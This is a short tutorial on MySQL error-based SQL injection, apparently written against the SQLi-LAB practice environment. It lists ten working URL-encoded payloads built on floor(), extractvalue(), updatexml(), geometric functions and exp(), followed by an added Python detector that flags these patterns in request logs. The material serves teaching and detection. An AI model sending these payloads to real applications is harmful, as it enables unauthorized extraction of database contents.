The lab environment is SQLi-LAB, Lesson 1:
I looked at some articles online; most of them list floor(), extractvalue(), updatexml() and exp() as the error-reporting functions, but MySQL has many other error-reporting functions as well.
1. floor()
payload:id=-1'+and+(select 1 from (select count(*),concat(user(),floor(rand()*2))x from information_schema.tables group by x limit 0,1)a)%23
2. extractvalue()
Using SQLi-LAB Lesson 2
payload:id=1+and+(extractvalue(1,concat(0x5c,(select user()))))%23
3. updatexml()
payload:id=1+and+(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))%23
4. GeometryCollection()
payload:id=1+and+GeometryCollection((select * from(select *from(select user())a)b))%23
5. polygon()
payload:id=1+and+polygon((select * from(select * from(select user())a)b))%23
6. multipoint()
payload:id=1+and+multipoint((select * from(select * from (select user())a)b))%23
7. multilinestring()
payload:id=1+and+multilinestring((select * from(select * from (select user())a)b))%23
8. multipolygon()
payload:id=1+and+multipolygon((select * from (select * from (select user())a)b))%23
9. linestring()
payload:id=1+and+linestring((select * from (select * from (select user())a)b))%23
10. exp()
payload:id=1+and+exp(~(select * from (select user())a))%23
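All ten payloads share one shape: a call to one of the listed functions in a request parameter that also carries a nested select, which makes them detectable in request logs. The following is an added example, not part of the original post: a log-side check for that shape, where the function names `flag_error_based_sqli` and `scan_request` and the sample request paths are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Functions the list above uses to make MySQL raise an error carrying query output.
ERROR_FUNCS = ("floor", "extractvalue", "updatexml", "geometrycollection",
               "polygon", "multipoint", "multilinestring", "multipolygon",
               "linestring", "exp")
CALL_RE = re.compile(r"\b(" + "|".join(ERROR_FUNCS) + r")\s*\(", re.I)
SUBQUERY_RE = re.compile(r"\(\s*select\b", re.I)


def normalize(value: str) -> str:
    """Undo up to three layers of URL encoding and collapse whitespace."""
    for _ in range(3):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value).strip()


def flag_error_based_sqli(raw_value: str) -> list:
    """Return the error-trigger functions called in a value that also holds a subquery."""
    value = normalize(raw_value)
    if not SUBQUERY_RE.search(value):
        return []  # a bare floor(3.7) with no nested select is not flagged
    return sorted({m.group(1).lower() for m in CALL_RE.finditer(value)})


def scan_request(path: str) -> dict:
    """Check every query parameter of one request path; return {param: [functions]}."""
    hits = {}
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        found = flag_error_based_sqli(value)
        if found:
            hits[name] = found
    return hits


# Constructed sample request paths (hypothetical endpoints, not captured traffic).
SAMPLE_REQUESTS = [
    "/lesson2/?id=1+and+exp(~(select+*+from+(select+user())a))%23",
    "/lesson2/?id=1+and+polygon((select+*+from(select+*+from(select+user())a)b))%23",
    "/lesson2/?id=7",
    "/report?expr=floor(3.7)",
]

if __name__ == "__main__":
    for path in SAMPLE_REQUESTS:
        print(scan_request(path) or "clean", path)
```

A hit is a signal for review rather than proof of compromise; the underlying fix remains parameterized queries and not returning database error text to the client.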